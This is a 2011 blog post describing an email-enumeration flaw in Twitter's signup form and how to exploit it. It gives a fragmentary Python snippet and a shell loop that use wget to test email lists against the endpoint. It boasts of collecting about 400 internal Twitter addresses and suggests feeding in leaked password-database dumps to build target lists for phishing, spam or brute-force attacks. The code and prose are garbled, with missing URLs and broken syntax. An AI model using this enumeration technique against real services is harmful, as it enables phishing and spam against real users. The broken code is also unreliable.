Mar 16, 2011

Using Twitter for Phishing Campaign / Spam / Followers?

Simple and easy way to get a list of email accounts used on Twitter.
For Phishing campaigns, custom Spam...

Twitter has been notified and I suppose someday be fixed if they think
there should be filtered.

When you create a new Twitter account, the form requesting a mailing
 address. Twitter verify that the email account is not being used, but
does not check any user token or limit the usage (captcha/block). ->

We just need to automate it with a simple script , ***Everything you
 do will be your responsibility***
import sys, json, urllib2, os

f = urllib2.urlopen(""+sys.argv[1])
data = json.load(f)
def valid()
Email has already been taken" in data ["msg"] <-- reply

We just need a list of users to test.. for example :  (don't be evil is just an
Parsing the name/nickname and testing the {user} () twitter com a few
minutes later we have a list of ~ 400 valid internal email
* () twitter com  An attacker could probably.. a brute force attack
(Google Apps), would send Phishing or try to exploit some browser bugs
or similar. #Aurora #Google. Most of these e-mail are internal, not
There are also some that make you think they are used to such
A-Directory system users :
apache () twitter com
root () twitter com
mail () twitter com

But, if you download a database Rockyou / / Gawker / or just a typical dictionaries and domains will be quite
easy to get hold of a list of users large enough (* () hotmail com,
* () gmail com, etc).For example in my case I used to find user accounts
in a pentest of a company that used Twitter. But probably not a good
idea to allow unlimited access, a malicious user could use these user
lists for Spam or Phishing.
After I read it all, I try to write it into shell script platform, my video will upload soon. 

echo "Start checking email to twitter"
for list in `cat testlist`
        wget -q -O testing$list
        echo -n "$list is "
        response=`cat testing | grep already`
        if [ -n "$response" ]
                echo "Email has already been taken"
                echo "Email has not been register to twitter"

No comments: